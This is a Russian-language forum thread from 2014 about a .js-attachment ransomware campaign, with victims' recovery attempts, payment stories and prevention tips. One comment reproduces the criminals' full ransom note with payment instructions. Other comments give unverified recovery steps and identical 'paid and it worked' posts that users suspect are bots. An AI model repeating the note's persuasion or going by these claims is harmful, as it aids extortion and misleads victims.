26.06.2014 в 5:52
.Js это тоже исполняемый файл. Как файл .cmd или .bat.
"s-lexer":

js не исполняемый файл.
"Atllantis":

Окей.
JavaScript — прототипно-ориентированный сценарный язык программирования. Является диалектом языка ECMAScript звучит лучше и понятней.

Да и вообще:


Синтаксис JScript во многом похож на язык JavaScript. Так же используется при создании вэб-страниц ASP. Относится к разделу Исполняемые файлы.

Описание файла .js : Исполняемый скрипт JScript

Исходя из этого можно грубо назвать его исполняемым. Что-бы понятней было.
Если вам больше нечего комментировать - помогайте людям. Подымайте планку познания. Расскажите что такое JS, почему он выполняется и прочее.
"s-lexer":

Немного не так выразился, я имел ввиду, что он по умолчанию не выполнится, как например файл с расширением .cmd или .bat, .exe и т.п.
"Atllantis":


js выполнился на ура, поверьте((
"alexbtl":

Блин, и правда выполняется по умолчанию в xp на виртуалке.
А у меня на 8.1 по умолчанию предлагает выбрать программу для открытия.
"Atllantis":

он может и при клике на картинку выполняться не знаю зачем эти скрипт-кидди вообще добавили его как JS , достаточно вспомнить i worm my pics ...... всё новое.......................
26.06.2014 в 5:54
сделал групповое переименование файлов, которым было добавлено непонятное расширение,затем проверил комп CureIt'ом, штатным KIS'ом.
"Mercury_78":

И что? Так просто? Получается что все, напрасно тут панику разводят? А там, лошары сидят и вирусы пишут?
"sit_79":

Не знаю. Я не программер, а юзеро-ламер. Как только мне сказали, что на компе творится фигня - первым делом вырубил от него инет. Вполне возможно, что просто таким образом исключил возможность для скрипта закачать вирус. А то, что у файлов на компе поменялось расширение, так может это работа самого скрипта, а не вируса, который на комп (судя по всему) не попал. А обратно поменять расширение у сотни-другой файлов - 30 секунд...
"Mercury_78":

Бред!
Сам скрипт ничего не делает вредного. Он только загружает вирус и после запускает его. Всё!
А уже запущенный вирус, шифрует файлы и меняет расширения файлов. Простым переименованием тут не отделаешься.
"Atllantis":

да просто есть другой вирь который все файлы скрывает и подменяет их екзешниками.....
26.06.2014 в 5:55
интересно, а на убунте тоже сработает...
Можно попробовать поставить AVG на вин, этот черт у меня спрашивает разрешение на выполз в интернет у каждого процесса, даже тогда, когда гугл хром пытается тупо обновится, так что думаю при запуске js так же спросил бы разрешить ли выкачивать килабайты, хотя и не факт конечно.
"felias":

тут простого настроенного фаера хватит, керио на сервак поставил и в путь, никто ж не виноват что гос конторы админов нанимают за 170 долларов в мес. Да, именно столько год назад в Исполкоме предложли.
26.06.2014 в 5:58
karlson_by, Два сервака приносили с такой фигней за месяц, ситуация - крах, моря мата, слез, а помочь нечем, кстати каспер пропустил!
"public_rt":

чё за каспер, как настроен ?
26.06.2014 в 6:00
Как пропатчить KDE2 под FreeBSD?
"Krent":

на хабре глянь )
26.06.2014 в 6:01
http://www.cyberforum.ru/javascript/thread97483.html ты об этом спрашивал?
"Bile":

тут какой-то бред (т.е. совершенно не по теме).

Поясню подробнее... Вот есть любая программа, запускается файлом с расширением *.exe
Все файлы с данным расширением в винде являются исполняемыми, т.е. они запускаются и выполняются.
Если же ты запустишь "вирус", ты просто (например) откроешь его у себя в блокноте, но он не будет выполнен. Так вот я и спрашиваю, каким образом данный файл выполняется?

Что делает обычный пользователь? Открыл архив с файлом, нажал на нём 2 раза и...
1. Будет предложено выбрать программу, с помощью которой открыть данный файл (обычно выбирают блокнот).
2. Файл откроется в блокноте.
...и опять же, он будет открыт как обычный текстовый файл.
"Atllantis":

Я понимаю. Я просто структуру вируса не видел. Там только один .js файл? Я думаю, там есть исполняемый файл, который через командную строку выпоняет .js скрипт.
"Bile":

да нет оленятки просто кликают по аттачу JS а дальше уже запускается всё остальное )
26.06.2014 в 8:02
Если кому будет интересно могу выслать копию вируса и материал с ним связанный. Сегодня проведем некоторые исследования по защите серваков от этой заразы.
26.06.2014 в 8:05
Я Переименовал (удалил расширение) и на Локальных дисках снес файл keyprivate кажется отправил им ( на адрес что указали) письмо с файлами для оценки стоимости работ(на самом деле не те файлы что просили под видом тех ) они запросили 400 евро за расшифровку 1000 файлов!) Уже два дня комп работает без их помощи! Лохи они и те кто скачивает письма подозрительные!
26.06.2014 в 8:13
На работе какой-то горе-хакер взломал RDP Администратора и получил доступ к серверу. Зашифровал все что только можно (безнаказанно лазил субботу и воскресенье). Среди зашифрованного была и база 1С. Чуть нашел, как с ним связаться, ибо свое письмецо оставил в таких дебрях, куда обычно не лазят просто так. Связался, а он оказывается потерял ключ к нашему серверу. Платить ему никто не собирался, было интересно, сколько он хочет за расшифровку, но этого не удалось узнать. Восстановил систему из бэкапа, благо шифратор не смог переварить 140 гиговый образ HDD. Вот только бухгалтерия пострадала, им пришлось месяц заново перебивать.

Так что опасная штука, эти шифраторы. Ведь даже антивирусы не могут распознать эту гадость, из-за использования обычных скриптов и легальных программ. Будьте бдительны.
26.06.2014 в 9:08
Архивы тамщемта при наличии мощного процессора и видеокарты с технологией CUDA расшифровываются за несколько часов. Гуглим статью на хабре про расшифровку архивов с разными методами шифрования
26.06.2014 в 9:16
Я Переименовал (удалил расширение) и на Локальных дисках снес файл keyprivate кажется отправил им ( на адрес что указали) письмо с файлами для оценки стоимости работ(на самом деле не те файлы что просили под видом тех ) они запросили 400 евро за расшифровку 1000 файлов!) Уже два дня комп работает без их помощи! Лохи они и те кто скачивает письма подозрительные!
"f300145469":

Я сделал то же самое, только кроме keyprivate еще с десяток различных файлов нашел...

Бред!
Сам скрипт ничего не делает вредного. Он только загружает вирус и после запускает его. Всё!
А уже запущенный вирус, шифрует файлы и меняет расширения файлов. Простым переименованием тут не отделаешься.
"Atllantis":

Бред, не бред, я не знаю, Вам видней... Я просто переименовал (убрал расширение), удалил все подозрительные файлы, прогнал двумя, а сейчас уже и третьим антивирем. Все выдает чисто. Никаких видимых следов не осталось. Третий день комп работает в штатном режиме. Повышенного потребления трафика на том компе не наблюдаю...
26.06.2014 в 10:23
IlyaSiliwonik, А бывают штуки , которые тебе dns запись меняют. Симптомы такие же как и при изменении файла hosts, а он чистый. Пока до человека дойдет , что где искать и уж на что менять)
26.06.2014 в 11:09
Достаточно обладать мозгами, а не просто слизкой массой, что бы не попасться на такие "вирусы".
Я хоть и работаю и вращаюсь в IT сфере, но даже свою жену научил как избегать таких банальных вирусов, хотя она с компьютером как с иностранцем.
На начальном этапе достаточно узнать что такое расширение файлов, у какого файла, какое оно должно быть и не открывать сомнительную почту, ссылки и тд. Овладев этими базовыми знаниями можно в 99% случаев не попасться на такие вирусы.
26.06.2014 в 11:21
[censored]
26.06.2014 в 12:26
Лавочку прикрыл

Здравствуйте.

По Вашему запросу N1313480 было получено новое сообщение.

Автор сообщения: Нешумов Александр (клиентская служба)
Время: 25 июня 2014 21:40
Тип: новое сообщение


================================
Здравствуйте.

Рассылка с данного сайта более не ведется, аккаунт был заблокирован.
================================
[censored]

7 495 604-10-81 (Москва)
7 812 244-10-81 (С.-Петербург)
8 800 333-10-81 (Россия)
26.06.2014 в 12:28
Появится с другого сайта.
26.06.2014 в 12:29
admin4, Я так понимаю, ключ лежит у них на сайте?
26.06.2014 в 13:31
вот так нужно деньги зарабатывать
26.06.2014 в 14:25
вот так нужно деньги зарабатывать
"deemitrik":

сча насоветуешь.
Статья 350. Модификация компьютерной информации

Изменение информации, хранящейся в компьютерной системе, сети или на машинных носителях, либо внесение заведомо ложной информации, причинившие существенный вред, при отсутствии признаков преступления против собственности (модификация компьютерной информации) – наказываются штрафом, или лишением права занимать определенные должности или заниматься определенной деятельностью, или арестом на срок от трех до шести месяцев, или ограничением свободы на срок до трех лет, или лишением свободы на тот же срок.
Модификация компьютерной информации, сопряженная с несанкционированным доступом к компьютерной системе или сети либо повлекшая по неосторожности последствия, указанные в части третьей статьи 349 настоящего Кодекса, – наказывается ограничением свободы на срок до пяти лет или лишением свободы на срок до семи лет с лишением права занимать определенные должности или заниматься определенной деятельностью или без лишения.
26.06.2014 в 15:59
Stranik, Это не блокировка. Файлы шифруются.
26.06.2014 в 16:13
IlyaSiliwonik, а как же ява скрипт? тоже сам отключится и шифровка файла тоже сама отвалится?
27.06.2014 в 5:54

вы маркетинг менеджер ERA HPC ? :)
27.06.2014 в 11:47
попался на эту удочку, все эксперименты сисадминов безуспешны, и заключение пока однозначное - вынужден платить.. единственное на что пошли - на уменьшение суммы ("радует" пока только то, что кто-то там есть, на том конце провода). если действительно пришлют и все сработает - пришлю разблокировщик, может кому-то все-таки еще поможет
27.06.2014 в 14:24
Я знаю этот вирус и боролся с ним на двух машинах . Поборол путем оплаты злоумышленникам денег . Так как были дороги данные . Ребята молодцы и не кинули и все расшифровали.
Всем советую будьте внимательны при открытии писем!
28.06.2014 в 8:20
keygen скиньте плиз
28.06.2014 в 12:42
И так, чтоб не попасться на такое в будущем...
Что нужно сделать:
1. Создайте файл "123.js".
2. Нажмите на файл ПКМ и выберите пункт "Открыть с помощью" (если там будет подменю, выберите "Выбрать другую программу...").
3. Поставьте галочку в "Использовать это приложение для всех файлов .js".
4. Выберите в списке "Блокнот".
Всё, теперь, когда Вы попытаетесь открыть подобный файл, он будет открыт в блокноте и вирус ничего не сможет сделать.
29.06.2014 в 19:06
Здравствуйте. Тоже попался на этот вирус из почты. Открыл у себя и у дочери почту и нажал на какое-то вложение. Ничего не открылось, только значки документов на рабочем столе стали белые. Попробовал у дочери, то же самое. У меня стоял антивир AVAST c обновленной базой, а удочери PANDA 2014. Потом оказалось что все документы и картинки зашифровались с расширением [censored]. Ни один антивирь нечего не заподозрил! В начале попробовал удалить расширение, но ничего не дало. Почитал форумы и понял, что бесполезно расшифровывать. Начал переписку с ними. Без хамства и угроз договорился до 100 евро. Только промучался переводить деньги на кошелек Bitcoin. Но все же перевел 4700 руб (0.21 Bitcoin) денег им. И они мне на следующий день прислали вторую половинку ключа. ВСЁ расшифровалось. Осталось у дочери, обещали то же выслать. Т.е. если жалко денег, то придется всё удалить или ждать у антивирусов дешифровчиков в течении от полугода до года. Или без хамства договориться о скидке, заплатить и работать дальше. Если начинать с ними с оскорблений, то о скидках позабудьте. Кто не верит могу скинуть ключи, дешифратор (DECODER) и зараженные файлы. Попробуйте, что всё получается расшифровать. НО данные ключи подходят только для моего компьютера. НЕ вздумайте запускать чужие ключи, иначе можете все потерять. Скопируйте ОБЯЗАТЕЛЬНО все зараженные файлы на флэшку, чтобы их не испортить на жестком.
30.06.2014 в 19:13
влетела сегодня на сервак 2003 тоже эта беда.. файлы переименовались, но не зашифровались..
вернул простым переименованием..
кто из юзеров это "словил" ХЕЗ.. почтовых ящиков сотни.. как проследить? каспер молчал.. нод молчал.. все молчали мля..
файрвол стоит на линуксе.. может не дал "обратки" вирусу поэтому и не зашифровались?
30.06.2014 в 19:46
fiex73, ваш слог удивительно похож на бота который тут пишет про сайт со всеми личными данными. Читаю и точно также тошнить хочется... Что, студент-айтишник тоже решил бабло заработать и свою Js-гадость пишет?)

Аа, и дата регистрации вчера ) Вы спецом зарегились чтоб написать это? Бот Ботович...
30.06.2014 в 21:17
artserge, Эта статья, чтоб помочь кому-то разобраться. Вы сами если столкнулись с этим вирусом и обезвредили его, то пишите и помогайте другим. Я не смог и заплатил за ключ. Кто занимается этим вирусом и расшифровкой я бы выслал и файлы и декодировщик и ключ для расшифровки. Может это им поможет спасти других, кто попался на это. Саму почту со вложением я удалил. А если предложить ничего не можешь и оскорблять других, то это удел школьников в онлайн-игрушках
01.07.2014 в 13:19
Добрый день! А можно вопрос знающим? Наличие файла оригинала и зашифрованного файла никак не может помочь расшифровке? (касается [censored])
02.07.2014 в 14:44
>Хорошо то как на MAC OS работать и не париться такими проблемами.
>Ипользуйте linux ребята и не будет у вас никаких проблем с потерей данных за 5 лет работы.

можно подумать макось или линукс от этого защищены :) странные вы.
вирь работает в юзер-моде ему права админа нафиг не нужны.
покриптует вам 'хомяк' как в винде криптует - разницы никакой.
мега-защищенные ос, ага. криптуется только 'хомяк'. ага.
так этот хомяк только и нужен, мне в общем сама операционка, в целом, пофигу. а вот документы в хомяке - как раз нет.
02.07.2014 в 14:46
>А можно вопрос знающим? Наличие файла оригинала и зашифрованного файла никак не может помочь расшифровке?

никак. мой напарник заплатил. черти присали вирь на мыло.
вообще - гмэйл могл бы до кучи такие письма не давать открывать вместе с экзешниками. это решило бы эту проблему (по крайней мере у нас)
03.07.2014 в 8:26
Упало письмецо на ящик с архивом zip, ввиду своей любознательности решил открыть глянуть одним глазком, ну и глазок чуть не треснул когда все мои фотографии и документы переименовались с окончанием [censored] Выпив валидола, стал кумекать что с этим делать. Жена конечно сразу назвала меня ласково и сказав что налазился по порно сайтам му..к вот тебе и божья кара (ей же не объяснишь что архив zip и порно ролики вещь разная) ну да бог с ней. Стал я обращаться за помощью к знакомым богам в сфере администрирования компьютеров для уничтожения вируса, что только не пытались начинали с загоревшимися глазами а заканчивалось все одинаково фразой без ключа не че не сделать. В итоге решил я вернуть так дорогие моему сердцу фотографии (точнее жена сказала что если свадебные фотки не верну, сам стану звездой порно роликов) Ну и отписал я ребятам что так мол и так или смерть мне через мампупу или фото все восстановлю. Ребята будучи ведать людьми знакомые с семейной жизнью запросили 140 евро. В итоге отложенные деньги на пиво с рыбкой ушли по направлению BitCoin. Итог мне прислали ключ, через 2 часа моего непрерывного моления над компом а я скажу вам что вспомнил даже что то из буддизма все вернулось на круги своя. Жена довольна а я теперь месяц без пивка.
05.07.2014 в 12:29
Доброго времени суток, уважаемые жители форума) В общем и целом ситуация идентична, после обеда пришло письмо в бухгалтерию, с ГРАМОТНЫМ текстом и с архивом, бухгалтера не смутило что название архива корявое до нельзя, она его открыла - там ещё один документ, нажала на него и комп начал глючить. Позвонила мне, сказала как есть - я сказал что как буду за удалёнкой зайду и разберусь... Зашел вечером и ..... был очень удивлён. Многие файлы (картинки, документы, архивы) были с окончанием .
Почитав форумы позвонил бухгалтеру и объяснил ситуацию что или все файлы (а их получилось через WIN+F 30к+) на свалку, потому что декриптовать нереально не имея ключа, или платить...
В общем решил придерживаться инструкции этих ....... хакеров. Написал на [censored] прикрепив KEY.PRIVATE, пару зашифрованных файлов, описание проблемы ну и разумеется "пожелания". Ответ задержался, я уже думал кинут, но через почти два часа пришло письмо с моими декриптованными файлами, краткой инструкцией по оплате и суммой в 300 у.е... Опять звоню буху, говорю как есть. Перевели... Отписал "хакерам", менее чем через час пришло письмо счастья с файлом) Стоял этот злосчастный комп буха и снова глючил часа 3 (кстати зашифровать 32249 файлов комп успел примерно за час сорок), только теперь пережевывая всё обратно. Думаю мне ещё долго придётся тестировать все архивы приходящие по почте на виртуалке)
Суть всей истории - если решитесь этим ............................................................ денег перевести - ну как минимум меня не кинули, сознательные и порядочные ............... "хакеры".
Сильно не пинайте, считаю должным отписать по форумам где находил информацию по своей (ну как своей))) проблеме, оставляю ответ на ваш суд)
09.07.2014 в 8:11
Сталкнулись с этой проблемой
Все файлы были ВРЕМЕННО ЗАБЛОКИРОВАНЫ с помощью алгоритма RSA-1024

1. Это инструкция, которая поможет разобраться с Вашей проблемой. Её решить вполне возможно, не переживайте.

2. Для решения данной проблемы нужно объединить наши общие ресурсы.
Ваши ресурсы:
- e-mail и доверие
- электронная валюта "за урок"
Наши ресурсы:
- Возможность разблокировать Ваш ключ (дешифровщик уже у Вас есть - DECODE.exe)
- Предоставим гарантии - после оплаты ключ будет передан, согласно договоренности
- Консультации после оплаты

3. Мы не из тех, кто шифруют данные, получают средства и затем пропадают.
В данном случае Вы и вправду имеете возможность разблокировать файлы.
Только есть небольшое временное ограничение (срок годности ключа не вечный)
Откладывать вопрос "на потом" также не вариант, плюс верить в чудеса не стоит.

4. У Вас есть два варианта:
а) Форматировать диски и вернуть 0% файлов - неразумно
б) Заплатить за свою невнимательность, вернуть все файлы и получить консультации - вполне правильно

5. Итак, попробуйте запустите Ваш дешифратор из архива. Вам напишет, что ключ не найден. Вот он Вам и нужен.
Если считаете, что дешифратор есть очередным вирусом, попросите любого сис.админа проанализировать его простую структуру

6. Тех.справка:
Ваш случай - ассиметричное шифрование RSA-1024 (используется в военной сфере. Взломать невозможно)
При шифровании, в разные места компьютера был скопирован специальный ID-файл 'KEY.PRIVATE'. Не потеряйте его (!!!)
Для каждого компьютера ID-файл создается новый. Он уникальный и в нём содержится код на дешифровку. Он нам и нужен.


7. Итак, наши с Вами шаги:
7.1. С нами связь держать можно только по электронной почте [censored]
7.2. В начале Вам необходимо получить гарантитого, что мы можем расшифровать файлы (бывают редкие случаи, когда уже не можем)
7.2. Структура Вашего письма:
- вложение Вашего ID-файла 'KEY.PRIVATE' (!!!) - поищите его на компьютере, без него восстановление невозможно
- 1-2 зашифрованных файла для проверки возможности расшифровки
- приблизительное колл-во зашифрованных файлов / компьютеров

7.3. В течение 1-го часа Вы получите гарантию и стоимость на Ваш ключ
7.4. Далее производится оплата, минимальная стоимость от 120 евро.
7.5. Мы отправляем Вам ключ, Вы его кладете в одну папку с дешифратором (DECODE.exe) и запускаете дешифратор
7.6. При запуске дешифратора производится скрытая дешифровка данных. Процесс запускать более 1-го раза нельзя.
7.7. Процесс дешифрования может занимать до 6-ти часов в скрытом режиме. По окончании процесса компьютер перезагрузится.

9. Советы:
9.1. После приобретения ключа, сделайте копию всех важных зашифрованных файлов на внешние носители.
9.2. В процессе дешифрования желательно не трогать компьютер, (!) ДВА раза запускать с ключем дешифратор не нужно.
9.3. Если думаете, что вместо дешифратора Вы получите очередной вирус, тогда поставьте вирт.систему и там проведите дешифровку.
9.2. Если какие-то файлы не будут окончательно расшифрованы, мы дорасшифруем вручную (передача файлов по почте)
9.3. Как защититься от этого? - Еженедельное резервное копирование. Не открывайте подозрительные файлы. Используйте MAC OS
DATE CRYPTED: 24.06.2014 / 12:21

Самостоятельные манипуляции не помогли
пришлось обратится по адресу в письме,
Слава богу не обманули радуемся восстановленной инфе
Ну а те кто прозевал получили по шапке.
10.07.2014 в 11:10
При наличии знании эта блокировка снимается на раз два и панику разводить не стоит
Но надо быть внимательным и не открывать всё подряд
"Stranik":

ты читать умеешь: код генерится случайным образом, а значит есть строчные, заглавные буквы, а так же цифры. не удивлюсь если длина строки будет в 10-15 символом с шифровкой на 512 бит. там даже самый опытный дешефратор будет сидеть и тюкать себе мозги матричными таблицами и попытками взлома.
10.07.2014 в 19:05
Народ, а если на шлюзе закрыть 25-й порт тупо - по идее, отправки ключа не произойдёт и файло шифровать не начнется?
15.07.2014 в 21:41
Попалась, оплатила 450 евро, через час
получила ключи и все расшифровала.
17.07.2014 в 12:51
Попался, оплатил 450 евро, через час получила ключи и все расшифровало.
18.07.2014 в 16:18
Попался, оплатил 450 евро, через час получила ключи и все расшифровало.
"victormish":

Попалась, оплатила 450 евро, через час
получила ключи и все расшифровала.
"srs-nn":

Боты?!
22.07.2014 в 22:09
karlson_by, не боты. Знакомый на днях тоже попася... Платил 670 евро. Ключи ему прислали примерно через час, все расшифровал. Как просто когда у человеков есть 670 евро ненужных... Эх.
30.07.2014 в 15:03
Тоже подцепил эту заразу... private после шифрования файлов лежит на компе и зашифрован их public-ом(хоть видит око, да зуб неймёт), и на расшифровку уйдёт уйма времени, года полтора... Списался, перевёл 450 денег, получил ключ, всё расшифровалось.
Никому другому этот ключ не поможет, поэтому выкладывать смысла нет.
30.08.2014 в 14:10
Такая же плачевная история… Перечитав форумы пришли к выводу, что вернули информацию те, кто заплатил. Связались по указанному адресу, в итоге вернули свое, но «невнимание» обошлось почти в 500 евро
03.09.2014 в 11:39
Итак! Делаем следующее:
1. Идем C:\Users\ВАШЕИМЯ_КОМПЬЮТЕРА\AppData\Roaming\
2. Удаляем папку system app
3. Заходим в папку Microsoft Office Standart
4. Удаляем файл Encryptor.exe
5. Запускаем Decrypt.exe(файлы должны расшифроваться)
6. После расшифровки удаляем папку Microsoft Office Standart
ГОТОВО!!!
04.10.2014 в 18:47
Всем привет. Вроде много раз слышал спам-рассылку и не думал, что это со мной произойдёт. В одном непримечательном письме попался алгоритм RSA-1024, который всё зашифровал. На рабочем столе появился блокнот с координатами аферистов. Самостоятельно разблокировать не получилось, так же как и с помощью прогера. Пришлось заплатить, так как было много нужной информации вариант с переустановкой винды меня не устраивал. Заплатил 15 000 рублей!!! Вот такой лопушок! Хорошо, что сдержали свои слова аферюги и не кинули. Мой совет: дублируйте информацию! )))
18.10.2014 в 18:49
Тоже столкнулся с проблемой зашифровывания файлов, сделал все как в статье - СТАТЬЯ помогло )
23.03.2015 в 23:56
люди там предлагают написать на электронные письма, сообщают кошельки на которые нужно перевести деньги сообщают номер! неужели этого недостаточно что бы начать копать под это всё и отследить чьё это всё???
23.03.2015 в 23:58
Кругом боты подстрекающие заплатить деньги! писец что с этой страной!!!